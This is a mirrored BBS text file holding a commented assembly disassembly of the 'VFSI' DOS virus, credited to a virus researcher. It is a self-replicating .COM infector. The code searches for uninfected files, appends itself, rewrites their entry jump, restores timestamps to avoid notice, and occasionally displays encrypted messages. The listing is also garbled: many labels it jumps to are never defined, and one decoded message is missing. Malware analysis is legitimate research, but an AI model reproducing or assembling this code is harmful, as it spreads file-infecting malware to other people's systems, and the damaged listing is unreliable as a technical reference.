mirror of
synced 2025-02-01 06:47:28 +00:00
326 lines
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326 lines
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; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
page ,132
name VFSI
title The 'VFSI' virus
.radix 16
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'VFSI' Virus º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
msg_len equ msg_2-msg_1 ; Length of each of the two messages
jmp v_entry ; Jump to the virus body
nop ; The rest of the infected program
mov ax,4C00 ; Just terminate
int 21
; 1-15 bytes of garbage (in order to align
; the virus code to a paragraph boundary):
db 7 dup (0)
mov ax,word ptr ds:[start+1]
add ax,offset start ; Compute the virus start address
mov cl,4 ; Convert it to a segment address
shr ax,cl
mov cx,ds
add ax,cx
inc ax
mov ds,ax ; Put this segment address in DS
jmp v_start ; Jump to the true virus code
first3 db 0EBh, 2, 90 ; The original first 3 bytes
fmask db '*.COM', 0 ; Files to search for
jmp_op db 0E9 ; A JMP to the virus body is formed here
jmp_adr dw 0Dh
; First of the two encrypted messages. It says:
msg_1 db 2Ah, 28h, 30h, 31h, 35h, 08h
db 09h, 0Ah, 0Ah, 33h, 2Dh, 3Dh
db 3Eh, 48h, 10h, 35h, 33h, 4Ch
db 14h, 56h, 64h, 5Bh, 18h, 4Ch
db 4Fh, 3Eh, 3Fh, 42h, 51h, 52h
; Second encrypted message. It says:
; ' from virus 1.1 VFSI-Svistov '
msg_2 db 02h, 03h, 4Ah, 57h, 55h, 54h
db 08h, 5Fh, 53h, 5Dh, 61h, 60h
db 0Eh, 20h, 1Eh, 22h, 12h, 49h
db 3Ah, 48h, 3Fh, 24h, 4Bh, 6Fh
db 63h, 6Eh, 70h, 6Ch, 74h, 1Fh
grb_len db 7 ; Length of the garbage added to the file
push ds ; Save DS
mov ax,ds:[first3-v_entry] ; Restore the original first 3
mov word ptr cs:[offset start],ax ; bytes of the infected file
mov al,ds:[first3+2-v_entry]
mov byte ptr cs:[offset start+2],al
mov ax,1A00 ; Set new DTA
lea dx,cs:[dta-v_entry]
int 21 ; Do it
mov ax,4E00 ; Find first .COM file in the current directory
lea dx,cs:[fmask-v_entry] ; File mask to search for
mov cx,00100010b ; Archive, Hidden and Normal files
int 21 ; Do it
jnc cont ; If found, continue
jmp close ; Otherwize exit
mov ax,3D02 ; Open the file for both reading and writing
lea dx,cs:[fname-v_entry]
int 21 ; Do it
mov bx,ax ; Save file handle in BX
mov ax,4202 ; Lseek to the end of file
xor cx,cx
xor dx,dx
int 21 ; Do it
mov word ptr ds:[fsize-v_entry],ax ; Save file size
sub ax,2 ; Lseek two bytes before the file end
mov dx,ax
mov ax,4200
int 21 ; Do it
mov ax,3F00 ; Read the last two bytes of the file
lea dx,cs:[last2-v_entry] ; Put them there
mov cx,2 ; (these bytes should contain
int 21 ; the virus signature)
mov cx,ds:[last2-v_entry] ; Get these bytes
cmp cx,ds:[sign-v_entry] ; Compare them with the virus signature
; If they are not equal, then the file is still not infected. Go infect it:
jne infect
mov ax,3E00 ; If file infected, close it
int 21 ; Do close
mov ax,4F00 ; Find the next .COM file
lea dx,cs:[dta-v_entry]
int 21 ; Do it
jmp srch_lp ; Loop until a non-infected file is found
; A non-infected file is found. Infect it:
mov ax,5700 ; Get file's date & time
int 21 ; Do it
push cx ; Save time & date on stack
push dx
mov ax,4200 ; Lseek to the file beginning
xor dx,dx
xor cx,cx
int 21 ; Do it
mov ax,3F00 ; Read the original first 3 bytes of the file
mov cx,3
lea dx,cs:[first3-v_entry] ; Save them in the virus body
int 21 ; Do it
mov ax,4200 ; Lseek to the beginning of the file again
xor dx,dx
xor cx,cx
int 21 ; Do it
; Align file size to the next multiple of 16:
mov ax,ds:[fsize-v_entry]
and ax,1111b
push ax ; Save AX
xor ax,1111b
inc ax
; Save the number of garbage bytes added in grb_len:
mov byte ptr ds:[grb_len-v_entry],al
add ax,ds:[fsize-v_entry] ; Form a Near JMP to the virus code
sub ax,3
mov word ptr ds:[jmp_adr-v_entry],ax ; Form the operand
mov ax,4000 ; Write this JMP in the first 3 bytes of file
lea dx,cs:[jmp_op-v_entry]
mov cx,3
int 21 ; Do it
mov ax,4202 ; Lseek to the end of file
mov dx,0
xor cx,cx
int 21 ; Do it
lea cx,cs:[v_end-v_entry-1] ; Virus size
pop ax ; Restore AX (new file size)
mov dx,ax
xor ax,1111b
add ax,2
add cx,ax ; Number of bytes to write
mov ax,ds ; DS := DS - 1
dec ax
mov ds,ax
mov ax,4000 ; Write the virus body after the end of file
int 21 ; Do it
pop dx ; Restore file's date & time
pop cx
mov ax,5701
int 21 ; Do it
mov ax,3E00 ; Close the file
int 21
pop ds ; Restore DS
mov ah,2C ; Get current time
int 21
; If the hundreds of seconds are > 20, quit.
; This means that the messages are displayed
; with a probability of about 1/5:
cmp dl,20d ; Hundreds of seconds > 20?
jg quit ; Exit if so
; Print the messages:
mov ax,0E07 ; Beep (teletype write of ASCII 7)
int 10 ; Do it
mov ax,0F00 ; Get video mode
int 10 ; Do it
push ax ; Save mode on the stack
xor ax,ax ; Set video mode to 40x25 text
int 10 ; Do it
mov cx,msg_len ; Put message length in CX
mov dx,0A06 ; Goto row 10, column 6
mov bl,0E ; Screen attribute: dark yellow on black
lea bp,cs:[msg_1-v_entry] ; Point to the first message
mov ah,2 ; Go to the next display position
int 10 ; Do it
mov si,msg_len ; Get an ecrypted character from the message
sub si,cx
mov al,ds:[bp+si]
add al,msg_len ; These two instruction are needless
sub al,msg_len
add al,cl ; Decrypt the character
mov ah,9 ; Write the character with the
int 10 ; selected attribute
inc dl ; Go to the next screen position
loop prt_msg ; Loop until done
cmp dh,10d ; Was this row 10?
jne msg_done ; If not, message printed; exit
mov cx,msg_len ; Otherwise get the length of the next message
mov bl,8C ; Screen attribute: blinking bright red on black
mov dx,0C06 ; Go to row 12, column 6
lea bp,cs:[msg_2-v_entry] ; Point to the second message
jmp prt_msg ; And go print it
xor cx,cx ; CX := 0
imul cx ; Cause a delay
imul cx
loop delay ; Loop until done
pop ax ; Restore video mode from the stack
xor ah,ah
int 10 ; Set it as it was originally
push cs ; DS := CS
pop ds
mov ax,1A00 ; Restore old DTA
mov dx,81
int 21 ; Do it
mov si,offset start ; Jump to address CS:100h
jmp si ; Do it
sign db 0F1, 0C8 ; Virus signature
v_end equ $
fsize equ $ ; Word. File size is saved here
last2 equ $+2 ; Word. Buffer for reading the virus signature
dta equ $+4 ; Disk Transfer Area
fname equ dta+1E ; File name found
code ends
end start